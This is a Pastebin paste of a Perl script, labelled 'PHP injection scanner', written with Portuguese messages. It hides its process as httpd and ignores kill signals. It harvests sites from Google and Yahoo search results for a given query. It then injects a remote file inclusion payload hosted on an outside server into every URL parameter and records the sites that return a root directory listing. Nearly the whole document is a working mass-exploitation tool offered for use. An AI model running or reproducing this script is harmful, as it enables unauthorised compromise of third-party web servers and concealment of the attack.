API tools faq
paste
Advertisement
rutera

PHP injection scanner

rutera
Jan 8th, 2015
233
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 5.33 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2.  
  3. use LWP::Simple;
  4. use IO::Socket::INET;
  5.  
  6.  
  7.  
  8. print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  9. print "\t[ PHP injection scanner 5.0 priv8 version \n\n\n";
  10.  
  11. if(!@ARGV[0]){
  12. print "\t[ use: perl php5.0.pl <procura> ]\n\n";
  13. exit;
  14. }
  15. print "\t[ Camuflando pid ]\n";
  16. my $processo = "/usr/local/sbin/httpd - spy";
  17. $SIG{"INT"} = "IGNORE";
  18. $SIG{"HUP"} = "IGNORE";
  19. $SIG{"TERM"} = "IGNORE";
  20. $SIG{"CHLD"} = "IGNORE";
  21. $SIG{"PS"} = "IGNORE";
  22.  
  23. $0="$processo"."\0"x16;;
  24. my $pid=fork;
  25. exit if $pid;
  26. die "Problema com o fork: $!" unless defined($pid);
  27.  
  28. print "\t[ Pid: $pid Processo: $processo ]\n";
  29.  
  30. $caxe = ".";
  31. $caxe1 = ".";
  32. $caxe .= rand(9999);
  33. $caxe1 .= rand(9999);
  34. $arq = ".";
  35. $arq = int rand(9999);
  36.  
  37. open(sites,">$arq");
  38. print sites "";
  39. close(sites);
  40.  
  41.  
  42. $procura = @ARGV[0];
  43. chomp $procura;
  44. print "\t[ Procurando por $procura no Google ]\n";
  45. for($n=0;$n<900;$n += 10){
  46. $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
  47. print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
  48. print $sock "Host: www.google.com.br";
  49. print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
  50. print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
  51. print $sock "Accept-Language: pt-br, pt;q=0.50";
  52. print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
  53. print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
  54. print $sock "Keep-Alive: 300";
  55. print $sock "Connection: keep-alive";
  56.  
  57. @resu = <$sock>;
  58. close($sock);
  59. $ae = "@resu";
  60. while ($ae=~ m/<a href=.*?>.*?<\/a>/){
  61.   $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
  62.   $uber=$1;
  63.    if ($uber !~/translate/)
  64.    {
  65.    if ($uber !~ /cache/)
  66.    {
  67.    if ($uber !~ /"/)
  68.    {
  69.    if ($uber !~ /google/)
  70.    {
  71.    if ($uber !~ /216/)
  72.    {
  73.    if ($uber =~/http/)
  74.    {
  75.    if ($uber !~ /start=/)
  76.    {
  77.      open(arq,">>$arq");
  78.           print arq "$uber\n";
  79.           close(arq);
  80. }}}}}}}}}
  81. print "\t[ Procurando por $procura no Cade   ]\n";
  82.  
  83. for($cadenu=1;$cadenu <= 991; $cadenu +=10){
  84.  
  85. @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
  86. $ae = "@cade";
  87.  
  88. while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
  89.   $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
  90.   $uber=$1;
  91.  
  92. $uber =~ s/ //g;
  93. $uber =~ s/<b>//g;
  94. $uber =~ s/<\/b>//g;
  95.  
  96. open(a,">>$arq");
  97. print a "$uber\n";
  98. close(a);
  99. }}
  100. print "\t[ Pronto sites pegos no google e cade ]\n";
  101. print "\t[ Excluindo os sites repetidos ]\n";
  102. $ark = $arq;
  103. @si = "";
  104. open (arquivo,"<$ark");
  105. @si = <arquivo>;
  106. close(arquivo);
  107. $novo ="";
  108. foreach (@si){
  109. if (!$si{$_})
  110. {
  111. $novo .= $_;
  112. $si{$_} = 1;
  113. }
  114. }
  115. open (arquivo,">$ark");
  116. print arquivo $novo;
  117. close(arquivo);
  118.  
  119.  
  120. $a =0;
  121. $b =0;
  122. open(ae,"<$arq");
  123. while(<ae>)
  124. {$sites[$a] = $_;
  125.   chomp $sites[$a];
  126.   $a++;
  127.   $b++;}
  128. close(ae);
  129. print "\t[ Total de sites para scanear: $a ]\n";
  130. for ($a=0;$a<=$b;$a++){
  131. open (file, ">$caxe");
  132.       print file "";
  133. close(file);
  134. open (file, ">$caxe1");
  135.       print file "";
  136. close(file);
  137. $k=0;
  138. $e=0;
  139. $data=get($sites[$a]) or next;
  140.   while($data=~ m/<a href=".*?">.*?<\/a>/){
  141.   $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
  142.   $ubersite=$1;
  143.  
  144.   if ($ubersite =~/"/)
  145.    {
  146.    $nu = index $ubersite, '"';
  147.    $ubersite = substr($ubersite,0,$nu);
  148.    }
  149. if ($ubersite !~/http/)
  150. {$ubersite = $sites[$a].'/'.$ubersite;}
  151. open(file,">>$caxe") || die("nao abriu caxe.txt $!");
  152. print file "$ubersite\n";
  153. close(file);
  154. }
  155.  
  156. $lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/';
  157. $t =0;
  158. $y =0;
  159. @ja;
  160. open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
  161. while (<opa>)
  162. {
  163. $ja[$t] = $_;
  164. chomp $ja[$t];
  165. $t++;
  166. $y++;
  167. }
  168. close(opa);
  169. $t=1;
  170. while ($t < $y)
  171.    {
  172.     if ($ja[$t] =~/=/)
  173.       {
  174.        $num = rindex $ja[$t], '=';
  175.        $num += 1;
  176.        $ja[$t] = substr($ja[$t],0,$num);
  177.             open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
  178.             print jaera "$ja[$t]$lista1\n";
  179.             close(jaera);
  180.         $num = index $ja[$t], '=';
  181.         $num += 1;
  182.         $ja[$t] = substr($ja[$t],0,$num);    
  183.         $num1 = rindex $ja[$t], '.';
  184.         $subproc = substr($ja[$t],$num1,$num);
  185.  
  186.             open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
  187.             print jaera "$ja[$t]$lista1\n";
  188.             close(jaera);
  189.       }
  190.      $t++;
  191.      }
  192. $ark = "$caxe1";
  193. @si = "";
  194. open (arquivo,"<$ark");
  195. @si = <arquivo>;
  196. close(arquivo);
  197. $novo ="";
  198. foreach (@si){
  199. if (!$si{$_})
  200. {
  201. $novo .= $_;
  202. $si{$_} = 1;
  203. }
  204. }
  205. open (arquivo,">$ark");
  206. print arquivo $novo;
  207. close(arquivo);
  208.    $q=0;
  209.    $w=0;
  210.     @hot;
  211.    open (ops,"<$caxe1");
  212.    while(<ops>)
  213.    {
  214.    $hot[$q] = $_;
  215.    chomp $hot[$q];
  216.    $q++;
  217.    $w++;
  218.    }
  219.    close(ops);
  220. print "\t[ Começando o scan aguarde. Pode demorar horas. ]\n";
  221. for($q=0;$q<=$w;$q++)
  222.   {
  223.  
  224.   if ($hot[$q] =~/http/)
  225.     {
  226.    $tipo=get($hot[$q]) or next;
  227.    if($tipo =~/root/)
  228.          {
  229.          if ($tipo =~/etc/)
  230.           {
  231.           if ($tipo =~/boot/)
  232.            {
  233.     open(a,">>res.txt");
  234.     print a "$hot[$q]\n";
  235.     close(a);
  236.                  }}}}}}
  237.  
  238. print "\t[ Pronto scanner concluido ]\n";
  239. print "\t[ O resultado foi salvo no ftp do spykids ]\n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!